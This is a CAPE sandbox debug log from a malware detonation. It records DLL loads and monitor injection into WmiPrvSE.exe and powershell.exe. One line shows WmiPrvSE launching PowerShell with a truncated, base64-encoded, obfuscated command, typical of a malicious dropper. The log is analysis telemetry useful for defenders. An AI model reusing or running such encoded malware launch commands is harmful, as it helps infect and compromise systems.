2019-10-10 01:11:40,973 [root] DEBUG: DLL loaded at 0x6ADA0000: C:\Windows\system32\wbem\wmiutils (0x17000 bytes).
2019-10-10 01:11:41,441 [root] DEBUG: DLL loaded at 0x000007FEF9E80000: C:\Windows\system32\VSSAPI (0x1b0000 bytes).
2019-10-10 01:11:41,441 [root] DEBUG: DLL loaded at 0x000007FEFB270000: C:\Windows\system32\ATL (0x19000 bytes).
2019-10-10 01:11:41,441 [root] DEBUG: DLL loaded at 0x000007FEF9E60000: C:\Windows\system32\VssTrace (0x17000 bytes).
2019-10-10 01:11:41,551 [root] DEBUG: DLL loaded at 0x000007FEFA870000: C:\Windows\system32\samcli (0x14000 bytes).
2019-10-10 01:11:41,582 [root] DEBUG: DLL loaded at 0x000007FEFB820000: C:\Windows\system32\SAMLIB (0x1d000 bytes).
2019-10-10 01:11:41,612 [root] DEBUG: DLL loaded at 0x000007FEFAC20000: C:\Windows\system32\netutils (0xc000 bytes).
2019-10-10 01:11:41,707 [root] DEBUG: DLL loaded at 0x000007FEFB0D0000: C:\Windows\system32\es (0x67000 bytes).
2019-10-10 01:11:41,956 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\PROPSYS (0x12c000 bytes).
2019-10-10 01:11:42,206 [root] DEBUG: DLL loaded at 0x000007FEF9540000: C:\Windows\system32\wbem\wbemcore (0x12f000 bytes).
2019-10-10 01:11:42,253 [root] DEBUG: DLL loaded at 0x000007FEF94D0000: C:\Windows\system32\wbem\esscli (0x6f000 bytes).
2019-10-10 01:11:42,267 [root] DEBUG: DLL loaded at 0x000007FEF9A00000: C:\Windows\system32\wbem\FastProx (0xe2000 bytes).
2019-10-10 01:11:42,267 [root] DEBUG: DLL loaded at 0x000007FEF9980000: C:\Windows\system32\NTDSAPI (0x27000 bytes).
2019-10-10 01:11:42,533 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 01:11:42,549 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 01:11:42,690 [root] DEBUG: DLL loaded at 0x6AD90000: C:\Windows\system32\wbem\wbemsvc (0xf000 bytes).
2019-10-10 01:11:42,891 [root] DEBUG: DLL loaded at 0x6ACF0000: C:\Windows\system32\wbem\fastprox (0x96000 bytes).
2019-10-10 01:11:42,986 [root] DEBUG: DLL loaded at 0x6ACD0000: C:\Windows\system32\NTDSAPI (0x18000 bytes).
2019-10-10 01:11:43,141 [root] DEBUG: DLL loaded at 0x000007FEFCAC0000: C:\Windows\system32\authZ (0x2f000 bytes).
2019-10-10 01:11:43,345 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 01:11:43,375 [root] DEBUG: DLL loaded at 0x000007FEF90B0000: C:\Windows\system32\wbem\repdrvfs (0x73000 bytes).
2019-10-10 01:11:43,484 [root] WARNING: File at path "C:\Windows\sysnative\wbem\repository\WRITABLE.TST" does not exist, skip.
2019-10-10 01:11:43,484 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\system32\Wevtapi (0x6d000 bytes).
2019-10-10 01:11:43,719 [root] DEBUG: DLL unloaded from 0x000007FEFCB00000.
2019-10-10 01:11:44,888 [root] DEBUG: DLL loaded at 0x000007FEF80F0000: C:\Windows\system32\wbem\wmiprvsd (0xbc000 bytes).
2019-10-10 01:11:44,920 [root] DEBUG: DLL loaded at 0x000007FEFA0C0000: C:\Windows\system32\NCObjAPI (0x16000 bytes).
2019-10-10 01:11:45,170 [root] DEBUG: DLL loaded at 0x000007FEF2C00000: C:\Windows\system32\wbem\wbemess (0x7e000 bytes).
2019-10-10 01:11:45,434 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:11:46,573 [root] DEBUG: DLL unloaded from 0x000007FEF9540000.
2019-10-10 01:11:46,885 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2760
2019-10-10 01:11:46,885 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:46,885 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:46,885 [root] DEBUG: Loader: Injecting process 2760 (thread 2152) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,885 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:11:46,885 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,885 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF73F000 - 0x000007FEFF430000
2019-10-10 01:11:46,885 [root] DEBUG: InjectDllViaIAT: Allocated 0x234 bytes for new import table at 0x00000000FF740000.
2019-10-10 01:11:46,901 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:46,901 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,901 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2760
2019-10-10 01:11:46,901 [root] INFO: Announced 64-bit process name: WmiPrvSE.exe pid: 2760
2019-10-10 01:11:46,901 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:46,901 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:46,901 [root] DEBUG: Loader: Injecting process 2760 (thread 2152) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,917 [root] DEBUG: Process image base: 0x00000000FF6E0000
2019-10-10 01:11:46,917 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,917 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:11:46,917 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:46,917 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2760
2019-10-10 01:11:46,917 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:46,917 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:46,917 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:46,933 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:46,933 [root] DEBUG: DLL loaded at 0x000007FEFA1E0000: C:\Windows\system32\wbem\ncprov (0x16000 bytes).
2019-10-10 01:11:46,933 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:46,933 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2760 at 0x000000006B360000, image base 0x00000000FF6E0000, stack from 0x00000000001C0000-0x00000000001D0000
2019-10-10 01:11:46,933 [root] DEBUG: Commandline: C:\Windows\sysnative\wbem\wmiprvse.exe -secured -Embedding.
2019-10-10 01:11:46,933 [root] INFO: Added new process to list with pid: 2760
2019-10-10 01:11:46,933 [root] INFO: Monitor successfully loaded in process with pid 2760.
2019-10-10 01:11:47,042 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:11:47,042 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 01:11:47,042 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 01:11:47,119 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 01:11:47,119 [root] DEBUG: DLL loaded at 0x000007FEF9D50000: C:\Windows\system32\wbem\wbemprox (0xf000 bytes).
2019-10-10 01:11:47,151 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 01:11:47,151 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 01:11:47,151 [root] DEBUG: DLL loaded at 0x000007FEFD000000: C:\Windows\system32\RpcRtRemote (0x14000 bytes).
2019-10-10 01:11:47,167 [root] DEBUG: DLL loaded at 0x000007FEFA0A0000: C:\Windows\system32\wbem\wbemsvc (0x14000 bytes).
2019-10-10 01:11:47,167 [root] DEBUG: DLL loaded at 0x000007FEF97C0000: C:\Windows\system32\wbem\wmiutils (0x26000 bytes).
2019-10-10 01:11:47,369 [root] DEBUG: DLL loaded at 0x000007FEF2A00000: C:\Windows\system32\wbem\cimwin32 (0x1fa000 bytes).
2019-10-10 01:11:47,369 [root] DEBUG: DLL loaded at 0x000007FEF4570000: C:\Windows\system32\framedynos (0x4c000 bytes).
2019-10-10 01:11:47,369 [root] DEBUG: DLL loaded at 0x000007FEFAFA0000: C:\Windows\system32\WTSAPI32 (0x11000 bytes).
2019-10-10 01:11:47,805 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\userenv (0x1e000 bytes).
2019-10-10 01:11:47,805 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-10-10 01:11:48,368 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2348
2019-10-10 01:11:48,384 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:48,507 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:48,555 [root] DEBUG: Loader: Injecting process 2348 (thread 1592) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:48,555 [root] DEBUG: Process image base: 0x000000013FDA0000
2019-10-10 01:11:48,601 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:48,664 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x000000013FE17000 - 0x000007FEFF430000
2019-10-10 01:11:48,696 [root] DEBUG: InjectDllViaIAT: Allocated 0x228 bytes for new import table at 0x000000013FE20000.
2019-10-10 01:11:48,710 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:11:48,742 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:48,742 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2348
2019-10-10 01:11:48,851 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-10-10 01:11:50,443 [root] INFO: Announced 64-bit process name: powershell.exe pid: 2348
2019-10-10 01:11:50,443 [lib.api.process] INFO: 64-bit DLL to inject is C:\awvqohb\dll\Wedqdzy.dll, loader C:\awvqohb\bin\wVQjMDmG.exe
2019-10-10 01:11:50,490 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\AXWCoGty.
2019-10-10 01:11:50,505 [root] DEBUG: Loader: Injecting process 2348 (thread 1592) with C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:50,536 [root] DEBUG: Process image base: 0x000000013FDA0000
2019-10-10 01:11:50,552 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:50,582 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:11:50,598 [root] DEBUG: Successfully injected DLL C:\awvqohb\dll\Wedqdzy.dll.
2019-10-10 01:11:50,645 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2348
2019-10-10 01:11:51,332 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:11:51,426 [root] INFO: Disabling sleep skipping.
2019-10-10 01:11:51,519 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:11:51,582 [root] WARNING: Unable to hook LockResource
2019-10-10 01:11:51,674 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:11:51,783 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2348 at 0x000000006B360000, image base 0x000000013FDA0000, stack from 0x0000000000165000-0x0000000000170000
2019-10-10 01:11:51,878 [root] DEBUG: Commandline: C:\Windows\sysnative\powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADEAYgAzAHgAMQA3ADkANgBjADMAPQAnAHgAYwAyADcANQAyADEANQAwADcANQAwADAAJwA7ACQAeAA4ADAAOAB4ADAAOQAwAHgAYwAwAGMAYw
2019-10-10 01:11:51,940 [root] INFO: Added new process to list with pid: 2348
2019-10-10 01:11:51,956 [root] INFO: Monitor successfully loaded in process with pid 2348.
2019-10-10 01:11:52,111 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:11:52,142 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\CLBCatQ (0x99000 bytes).
2019-10-10 01:11:52,190 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\shell32 (0xd88000 bytes).
2019-10-10 01:11:52,236 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\system32\USERENV (0x1e000 bytes).
2019-10-10 01:11:52,236 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\system32\profapi (0xf000 bytes).
2019-10-10 01:11:52,283 [root] DEBUG: DLL loaded at 0x000007FEFBB00000: C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\comctl32 (0x1f4000 bytes).
2019-10-10 01:11:52,329 [root] DEBUG: DLL loaded at 0x000007FEFB840000: C:\Windows\system32\propsys (0x12c000 bytes).
2019-10-10 01:11:52,377 [root] DEBUG: DLL loaded at 0x000007FEFE4A0000: C:\Windows\system32\SETUPAPI (0x1d7000 bytes).
2019-10-10 01:11:52,377 [root] DEBUG: DLL loaded at 0x000007FEFD1B0000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2019-10-10 01:11:52,424 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2019-10-10 01:11:52,627 [root] DEBUG: DLL loaded at 0x000007FEFC190000: C:\Windows\system32\ntmarta (0x2d000 bytes).
2019-10-10 01:11:52,674 [root] DEBUG: DLL loaded at 0x000007FEFE860000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2019-10-10 01:11:52,782 [root] DEBUG: DLL unloaded from 0x000007FEFD560000.
2019-10-10 01:11:53,095 [root] DEBUG: DLL loaded at 0x000007FEF7810000: C:\Windows\system32\LINKINFO (0xc000 bytes).
2019-10-10 01:11:53,220 [root] DEBUG: DLL loaded at 0x000007FEF8900000: C:\Windows\system32\ntshrui (0x80000 bytes).
2019-10-10 01:11:53,282 [root] DEBUG: DLL loaded at 0x000007FEFCB90000: C:\Windows\system32\srvcli (0x23000 bytes).
2019-10-10 01:11:53,484 [root] DEBUG: DLL loaded at 0x000007FEF8AC0000: C:\Windows\system32\cscapi (0xf000 bytes).
2019-10-10 01:11:53,578 [root] DEBUG: DLL loaded at 0x000007FEFB0B0000: C:\Windows\system32\slc (0xb000 bytes).
2019-10-10 01:11:53,812 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2019-10-10 01:11:54,062 [root] DEBUG: DLL loaded at 0x6AB30000: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus (0x190000 bytes).
2019-10-10 01:11:54,374 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:11:54,390 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\rsaenh (0x47000 bytes).
2019-10-10 01:11:54,811 [root] DEBUG: DLL loaded at 0x000007FEF2D70000: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei (0x97000 bytes).
2019-10-10 01:11:55,247 [root] DEBUG: DLL loaded at 0x000007FEF2060000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks (0x99d000 bytes).
2019-10-10 01:11:55,325 [root] DEBUG: DLL loaded at 0x000000006AA60000: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_88df89932faf0bf6\MSVCR80 (0xc9000 bytes).
2019-10-10 01:11:57,009 [root] DEBUG: DLL loaded at 0x000007FEF1180000: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\9469491f37d9c35b596968b206615309\mscorlib.ni (0xedc000 bytes).
2019-10-10 01:11:57,165 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 01:11:57,384 [root] DEBUG: DLL loaded at 0x000007FEF0750000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System\adff7dd9fe8e541775c46b6363401b22\System.ni (0xa23000 bytes).
2019-10-10 01:11:57,477 [root] DEBUG: DLL loaded at 0x000007FEF0690000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b023321bc53c20c10ccbbd8f78c82c82\Microsoft.PowerShell.ConsoleHost.ni (0xb2000 bytes).
2019-10-10 01:11:57,743 [root] DEBUG: DLL loaded at 0x000007FEEFB30000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management.A#\009a09f5b2322bb8c5520dc5ddbb28bb\System.Management.Automation.ni (0xb5d000 bytes).
2019-10-10 01:11:57,805 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\version (0xc000 bytes).
2019-10-10 01:11:58,196 [root] DEBUG: DLL unloaded from 0x000007FEFE320000.
2019-10-10 01:11:58,398 [root] DEBUG: DLL loaded at 0x000007FEEF800000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Core\83e2f6909980da7347e7806d8c26670e\System.Core.ni (0x32e000 bytes).
2019-10-10 01:11:58,398 [root] DEBUG: DLL loaded at 0x000007FEF8080000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\ec50af274bf7a15fb59ac1f0d353b7ea\Microsoft.PowerShell.Commands.Diagnostics.ni (0x69000 bytes).
2019-10-10 01:11:58,414 [root] DEBUG: DLL loaded at 0x000007FEF56C0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuratio#\fcf35536476614410e0b0bd0e412199e\System.Configuration.Install.ni (0x32000 bytes).
2019-10-10 01:11:58,414 [root] DEBUG: DLL loaded at 0x000007FEEF750000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.WSMan.Man#\8cd73e65058ef6f77f36b62a74ec3344\Microsoft.WSMan.Management.ni (0xaa000 bytes).
2019-10-10 01:11:58,726 [root] DEBUG: DLL loaded at 0x000007FEEF660000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Transactions\051655963f24f9ade08486084c570086\System.Transactions.ni (0xe5000 bytes).
2019-10-10 01:11:58,742 [root] DEBUG: DLL loaded at 0x000000001E230000: C:\Windows\assembly\GAC_64\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions (0x49000 bytes).
2019-10-10 01:11:58,819 [root] DEBUG: DLL loaded at 0x000007FEEF440000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\cdf48153115fc0bb466f37b7dcad9ac5\Microsoft.PowerShell.Commands.Utility.ni (0x216000 bytes).
2019-10-10 01:11:58,851 [root] DEBUG: DLL loaded at 0x000007FEEF320000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\9206dc8156588e608d405729c833edc5\Microsoft.PowerShell.Commands.Management.ni (0x118000 bytes).
2019-10-10 01:11:58,881 [root] DEBUG: DLL loaded at 0x000007FEF4E10000: C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.PowerShel#\b5a6a5ce3cd3d4dd2b151315c612aeff\Microsoft.PowerShell.Security.ni (0x3e000 bytes).
2019-10-10 01:11:58,944 [root] DEBUG: DLL loaded at 0x00000642FF4A0000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\culture (0xa000 bytes).
2019-10-10 01:11:59,038 [root] DEBUG: DLL unloaded from 0x00000642FF4A0000.
2019-10-10 01:11:59,427 [root] DEBUG: DLL loaded at 0x000007FEEF190000: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorjit (0x184000 bytes).
2019-10-10 01:12:00,036 [root] DEBUG: DLL loaded at 0x000007FEEEAE0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\ee795155543768ea67eecddc686a1e9e\System.Xml.ni (0x6a5000 bytes).
2019-10-10 01:12:00,098 [root] DEBUG: DLL loaded at 0x000007FEEE970000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Management\c44929bde355680c886f8a52f5e22b81\System.Management.ni (0x16c000 bytes).
2019-10-10 01:12:00,161 [root] DEBUG: DLL loaded at 0x000007FEEE7D0000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.DirectorySer#\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\System.DirectoryServices.ni (0x195000 bytes).
2019-10-10 01:12:00,255 [root] DEBUG: DLL loaded at 0x000007FEF9B90000: C:\Windows\system32\shfolder (0x7000 bytes).
2019-10-10 01:12:00,707 [root] DEBUG: DLL loaded at 0x000007FEFCCF0000: C:\Windows\system32\secur32 (0xb000 bytes).
2019-10-10 01:12:01,082 [root] DEBUG: DLL loaded at 0x000007FEEDF80000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Data\accc3a5269658c8c47fe3e402ac4ac1c\System.Data.ni (0x84b000 bytes).
2019-10-10 01:12:01,346 [root] DEBUG: DLL loaded at 0x000000001CEF0000: C:\Windows\assembly\GAC_64\System.Data\2.0.0.0__b77a5c561934e089\System.Data (0x2ff000 bytes).
2019-10-10 01:12:01,487 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2019-10-10 01:12:01,611 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2019-10-10 01:12:01,721 [root] DEBUG: DLL loaded at 0x000007FEFD1F0000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2019-10-10 01:12:01,799 [root] DEBUG: DLL loaded at 0x000007FEFD100000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2019-10-10 01:12:02,361 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:02,424 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:02,563 [root] DEBUG: DLL unloaded from 0x6B740000.
2019-10-10 01:12:02,688 [root] DEBUG: DLL unloaded from 0x75C10000.
2019-10-10 01:12:03,048 [root] DEBUG: DLL loaded at 0x6A660000: C:\Windows\system32\WindowsCodecs (0xfb000 bytes).
2019-10-10 01:12:03,062 [root] DEBUG: set_caller_info: Adding region at 0x000007FF00250000 to caller regions list (advapi32::RegOpenKeyExW).
2019-10-10 01:12:03,157 [root] DEBUG: DLL loaded at 0x000007FEEDE30000: C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\091b931d0f6408001747dbbbb05dbe66\System.Configuration.ni (0x143000 bytes).
2019-10-10 01:12:03,983 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:03,983 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:04,029 [root] INFO: Announced 32-bit process name:  pid: 1
2019-10-10 01:12:04,029 [lib.api.process] WARNING: The process with pid 1 is not alive, injection aborted
2019-10-10 01:12:04,747 [root] DEBUG: DLL loaded at 0x000007FEF54D0000: C:\Windows\system32\rasapi32 (0x62000 bytes).
2019-10-10 01:12:04,779 [root] DEBUG: DLL loaded at 0x000007FEF54B0000: C:\Windows\system32\rasman (0x1c000 bytes).
2019-10-10 01:12:04,904 [root] DEBUG: DLL loaded at 0x000007FEFA720000: C:\Windows\system32\rtutils (0x11000 bytes).
2019-10-10 01:12:05,246 [root] DEBUG: DLL loaded at 0x000007FEFC890000: C:\Windows\system32\mswsock (0x55000 bytes).
2019-10-10 01:12:05,246 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:12:05,371 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2019-10-10 01:12:05,371 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:05,371 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:12:05,388 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2019-10-10 01:12:05,418 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:05,559 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:05,575 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:05,621 [root] DEBUG: DLL unloaded from 0x000007FEF54B0000.
2019-10-10 01:12:05,667 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:12:05,700 [root] DEBUG: DLL unloaded from 0x000007FEF9860000.
2019-10-10 01:12:05,809 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\winhttp (0x71000 bytes).
2019-10-10 01:12:05,809 [root] DEBUG: DLL loaded at 0x000007FEF4FC0000: C:\Windows\system32\prntvpt (0x2a000 bytes).
2019-10-10 01:12:05,855 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2019-10-10 01:12:06,058 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2019-10-10 01:12:06,089 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
2019-10-10 01:12:06,167 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:06,198 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:06,260 [root] DEBUG: DLL loaded at 0x000007FEFAD90000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2019-10-10 01:12:06,292 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:06,292 [root] DEBUG: DLL loaded at 0x000007FEFAD70000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2019-10-10 01:12:06,338 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:12:06,480 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:06,510 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:06,510 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:12:06,604 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:12:06,604 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2019-10-10 01:12:06,604 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2019-10-10 01:12:06,884 [root] DEBUG: DLL loaded at 0x6A620000: C:\Program Files (x86)\Microsoft Office\Office14\msproof7 (0x39000 bytes).
2019-10-10 01:12:07,026 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2019-10-10 01:12:07,197 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2019-10-10 01:12:08,210 [root] DEBUG: DLL unloaded from 0x000007FEFC3B0000.
2019-10-10 01:12:08,648 [root] DEBUG: DLL unloaded from 0x6B740000.
2019-10-10 01:12:18,257 [root] DEBUG: DLL unloaded from 0x000007FEFE8C0000.
2019-10-10 01:12:18,615 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:19,848 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:12:19,848 [root] DEBUG: DLL unloaded from 0x6B6C0000.
2019-10-10 01:12:19,848 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:19,864 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:19,880 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:19,927 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:20,862 [root] DEBUG: DLL unloaded from 0x000007FEF9860000.
2019-10-10 01:12:20,894 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:20,971 [root] DEBUG: DLL unloaded from 0x000007FEF2ED0000.
2019-10-10 01:12:20,987 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:20,987 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:21,033 [root] DEBUG: DLL unloaded from 0x000007FEF9880000.
2019-10-10 01:12:21,081 [root] DEBUG: DLL unloaded from 0x000007FEF8A20000.
2019-10-10 01:12:21,158 [root] DEBUG: DLL unloaded from 0x000007FEF9860000.
